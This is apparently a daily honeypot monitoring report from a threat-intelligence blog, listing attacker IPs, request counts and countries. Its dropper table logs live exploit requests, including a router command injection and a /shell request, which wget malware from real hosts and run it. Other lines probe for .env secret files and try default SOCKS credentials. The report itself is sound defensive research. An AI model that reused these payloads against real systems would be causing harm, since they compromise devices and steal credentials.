Skip to main content
  1. Daily-Posts/

Report: 2025-09-01

·366 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-09-01
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 24 new requests that have never been observed before (these were added to the monitored request database.).

A total of 576 requests were recorded during the day, originating from 4 different countries, with a peak of 113 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
187.72.115.45GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
121.167.125.180GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
75.110.226.226GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
45.153.34.242GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C/91.224.92.22:58485/observatory/arm7;chmod+777+arm7;./arm7+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
732CONNECT 196.251.83.215:80 HTTP/1.0
1101GET /.env-ssl-cert HTTP/1.1
1131GET /.env-sendgrid HTTP/1.1
1141GET /.env-settings HTTP/1.1
1171GET /.env-tls-cert HTTP/1.1
1191GET /.env-tutorial HTTP/1.1
1231GET /.env.api.json HTTP/1.1
1241GET /.env.aws-prod HTTP/1.1
1251GET /.env.backup.1 HTTP/1.1
1261GET /.env.backup.2 HTTP/1.1
1271GET /.env.defaults HTTP/1.1
1291GET /.env-supabase HTTP/1.1
1311GET /.env-smtp.env HTTP/1.1
1331GET /.env.keys.env HTTP/1.1
1341GET /.env.key.json HTTP/1.1
1351GET /.env.keys.txt HTTP/1.1
1451\x04\x01\x00P\xC4\xFBS\xD7\x00
1461\x04\x01\x00P\xC4\xFBS\xD7user:1234\x00
1471\x04\x01\x00P\xC4\xFBS\xD7debian:debian\x00
1481\x04\x01\x00P\xC4\xFBS\xD7support:support\x00
1491\x04\x01\x00P\xC4\xFBS\xD7manager:manager\x00
1611GET /.env.disabled HTTP/1.1
1621GET /.env.firebase HTTP/1.1
1641GET /.env-throttle HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0113US
1110GB
261SG
349JP
446SO
546MM
629DE
721SC
814IN
913NL
1013BG
1111HK
1211SE
1310CA
148CN
153BR
163KR
172MN
182CH
192VN
202RU
211ES
221FR
231CZ
241IT
251IR
261TW
271BE

Related

Report: 2025-08-31
·304 words
Repport Daily
Report: 2025-08-30
·331 words
Repport Daily
Report: 2025-08-29
·440 words
Repport Daily